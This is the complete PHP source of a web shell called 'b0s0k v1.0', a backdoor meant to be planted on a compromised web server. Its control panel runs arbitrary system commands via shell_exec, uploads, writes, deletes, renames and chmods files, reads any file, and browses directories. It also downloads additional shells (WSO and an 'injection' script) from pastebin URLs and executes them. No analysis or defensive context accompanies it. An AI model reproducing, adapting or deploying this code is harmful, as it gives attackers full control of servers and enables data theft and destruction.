b0s0k shell

1. <?php
2.  
3. @error_reporting(0);
4. @set_time_limit(0);
5.  
6.  
7. echo"
8. <html>
9. <head>
10. <title>b0s0k v1.0</title>
11. </head>
12. <body bgcolor=\"#708090\">
13. <table border=\"1\" width=\"100%\" height=\"100%\">
14. <tr>
15. <td width=\"300px\" height=\"100px\">
16. <table><tr><td width=300>
17. <img src=\"http://sman24kabtangerang.sch.id/file/bosok.png\" width=\"200\" height=\"200\">
18. </pre></td></tr></table>
19. </td>";
20. $path = $_POST['locup'];
21. if(isset($_FILES['file'])){
22. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
23. echo "<script>alert('Upload Done!')</script>";
24. }else{
25. echo "<script>alert('Upload Failed!')</script>";
26. }
27. }
28. if(isset($_POST['snewd'])){
29.     if(mkdir($_POST['newd'])){
30.         echo"<script>alert('Done!')</script>";
31.     }else{
32.         echo"<script>alert('Failed!')</script>";
33.     }
34. }
35. if($_GET['sd']){
36.     $candir = $_POST['sd'];
37. }
38. echo"
39. <td width=\"800px\" height=\"100px\">
40. <font color=\"red\">b0s0k</font><font color=\"white\"> shell coded by : shutdown57</font>
41. <table border=\"1\">
42. <tr><td colspan=\"4\">
43. <fieldset><legend>Upload Area</legend>
44. <form enctype=\"multipart/form-data\" method=\"POST\">
45. Upload File : <input type=\"file\" name=\"file\" />
46. Location :<input type=\"text\" value=\"".getcwd()."\"  name=\"locup\">
47. <input type=\"submit\" value=\"upload\"  />
48. </form>
49. </fieldset>
50. </td></tr>
51. <tr><td width=50%>
52. <form method=\"post\">
53. New dir :<input type=\"text\" value=\"".getcwd()."/NewDir\" name=\"newd\"><input type=\"submit\" value=\"==>\" name=\"snewd\">
54. </form></td>";
55. if(isset($_POST['snewd'])){
56.     if(mkdir($_POST['newd'])){
57.         echo"<script>alert('Done!')</script> ";
58.     }else{
59.         echo"<script>alert('Failed')</script>";
60.     }
61. }
62. echo"
63. <td>
64. <form method=\"post\">
65. Delete dir :<input type=\"text\" value=\"".getcwd()."/dir\" name=\"deld\"><input type=\"submit\" value=\"==>\" name=\"sdeld\">
66. </form>
67. </td>
68. </td></tr>";
69. if(isset($_POST['sdeld'])){
70.     if(rmdir($_POST['deld'])){
71.         echo"<script>alert('Done!')</script>";
72.     }else{
73.         echo"<script>alert('Failed')</script>";
74.     }
75. }
76. echo"<tr>
77. <td colspan=\"3\">
78. <form method=\"get\">
79. sc4nd1r :
80. <input type=\"text\" value=\"".getcwd()."\" name=\"s57\" style=\"width:90%\"><input type=\"submit\" value=\"==>\"></td></tr><td colspan=\"3\">
81. Current Path :";
82. if(isset($_GET['s57'])){
83. $path = $_GET['s57'];
84. }else{
85. $path = getcwd();
86. }
87. $path = str_replace('\\','/',$path);
88. $paths = explode('/',$path);
89.  
90. foreach($paths as $id=>$pat){
91. if($pat == '' && $id == 0){
92. $a = true;
93. echo '<a href="?s57=/">/</a>';
94. continue;
95. }
96. if($pat == '') continue;
97. echo '<a href="?s57=';
98. for($i=0;$i<=$id;$i++){
99. echo "$paths[$i]";
100. if($i != $id) echo "/";
101. }
102. echo '">'.$pat.'</a>/';
103. }
104. echo"</td><td><p style=\"transform:rotate(10deg)\">b0s0k v1.0</td></tr>
105. </form></td></tr>
106. </table>
107.  
108.  
109. </td></tr>
110. <tr>
111. <td>
112.  
113. <table border=\"1\">
114. <tr><td>
115. <a href=\"?shell=injection\">1n73ction</a>
116. </td></tr>
117. <tr><td>
118. <a href=\"?shell=wso\">WSO</a></td></tr>
119. <tr><td> <form method=\"get\">
120. View file:<input type=\"text\" value=\"".getcwd()."/index.php\" name=\"vf\" style=\"margin-top:0;\"><input type=\"submit\" value=\"==>\" ></form></td></tr>
121. <tr><td>
122. command;<form method=\"get\">
123. <input type=\"text\" value=\"uname\" name=\"cmdx\" style=\"margin-top:0;\"><input type=\"submit\" value=\"==>\" ></form></td></tr>
124. <tr><td colspan=\"2\">
125.  
126. <form method=\"post\">
127. Delete file:<input type=\"text\" value=\"".getcwd()."/file.php\" name=\"delf\"><input type=\"submit\" value=\"==>\" name=\"sdelf\">
128. </form>
129. </td></tr>";
130. if(isset($_POST['sdelf'])){
131.     if(unlink($_POST['delf'])){
132.         echo"<script>alert('Done!')</script>";
133.     }else{
134.         echo"<script>alert('Failed!')</script>";
135.     }
136. }
137. echo"<tr><td colspan=\"2\">
138. <form method=\"post\">
139. <textarea name=\"newf\" style=\"width:100%;height:170px;\">
140. //New File Here
141. </textarea>
142. save as :<input type=\"text\" value=\"".getcwd()."/s57.php\" name=\"sf\" width=\"80%\">
143. <input type=\"submit\" value=\"==>\" name=\"ssf\">
144.  
145. </form>
146. </td></tr>";
147. if(isset($_POST['ssf'])){
148.     $fpx = fopen($_POST['sf'],"a+");
149.     if(fwrite($fpx,$_POST['newf'])){
150.         echo"<script>alert('Done!')</script>";
151.     }else{
152.         echo"<script>alert('Failed!')</script>";
153.     }
154.     fclose($fpx);
155. }
156. echo"
157. <tr><td><fieldset> <legend>ChMod area</legend>
158. <form method=\"post\">
159. file :<input type=\"text\" name=\"fc\">
160. Perms:<input type=\"text\" name=\"ch\"><br>
161. <input type=\"submit\" value=\"Change\" name=\"sch\">
162. </form>
163. </fieldset>
164. </td></tr>";
165. if(isset($_POST['sch'])){
166.     if(chmod($_POST['fx'],$_POST['ch'])){
167.         echo"<script>alert('Done!')</script>";
168.     }else{
169.         echo"<script>alert('Failed')</script>";
170.     }
171. }
172.  
173. echo"
174. <tr><td><fieldset><legend>ReName Area</legend>
175. <form method=\"post\">
176. Old :<input type=\"text\" name=\"old\">
177. New :<input type=\"text\" name=\"new\"><br>
178. <input type=\"submit\" value=\"Change\" name=\"srn\">
179. </fieldset></form></td></tr>
180. </table>";
181. if(isset($_POST['srn'])){
182.     if(rename($_POST['old'],$_POST['new'])){
183.         echo"<script>alert('Done!')</script>";
184.     }else{
185.         echo"<script>alert('Failed!')</script>";
186.     }
187. }
188. echo"
189. </td>
190. <td width=\"80%\">
191. ";
192. if($_GET['vf']){
193. echo"<pre>".htmlspecialchars(file_get_contents($_GET['vf']))."</pre>";
194. }
195. if($_GET['cmdx']){
196.     echo"<pre>"; if(shell_exec($_GET['cmdx'])){
197.     echo"root@b0s0k~#:".shell_exec($_GET['cmdx'])."";
198.     }else{
199.         echo"root@b0s0k~#:<font color='red'>".$_GET['cmdx'].";</font>Command Not Found!";
200.     }
201. }
202. if($_GET['shell'] =='wso'){
203.     $fpshell = fopen('wso.php','a+');
204.     $shell = file_get_contents('http://pastebin.com/raw/cuWAmsUE');
205.     if(fwrite($fpshell,$shell)){echo"<script>alert('Done!')</script>
206.     <iframe src=\"wso.php\" width=\"100%\" height=\"100%\"></iframe>
207.     ";}else{
208.         echo"<script>alert('Failed')</script>";
209.     }
210.     fclose($fpshell);
211.    
212.     }
213.     if($_GET['shell'] == 'injection'){
214.         $isib = file_get_contents("http://pastebin.com/raw/KXHAYEj7");
215.         $fpb = fopen('injek.php','a+');
216.         if(fwrite($fpb,$isib)){
217.             echo"<script>alert('Done!')</script>
218.             <iframe src='injek.php' width='100%' height='100%'></iframe>";
219.         }else{
220.             echo"<script>alert('Failed!')</script>";
221.         }   }
222.  
223. echo"</pre>
224. <pre>
225. ";
226. if($_GET['s57']){
227. print_r(scandir($_GET['s57']));}
228. echo"
229. </td>
230. </tr></table>
231. ";
232. echo"<style type=\"text/css\">
233. body{color:#000;}
234. input[type=\"submit\"]{
235.     color:#eee;
236.     background:#789;
237.     border:1px outset #fff;
238. }
239. input[type=\"text\"]{
240.     color:#eee;
241.     background:#789;
242.     border:1px inset #fff;
243. }
244. textarea{
245.     color:#eee;
246.     background:#789;
247.     border:1px inset #fff;
248. }
249. a{color:#f00;border-bottom:1px inset #fff;}
250. </style>
251. ";
252. ?>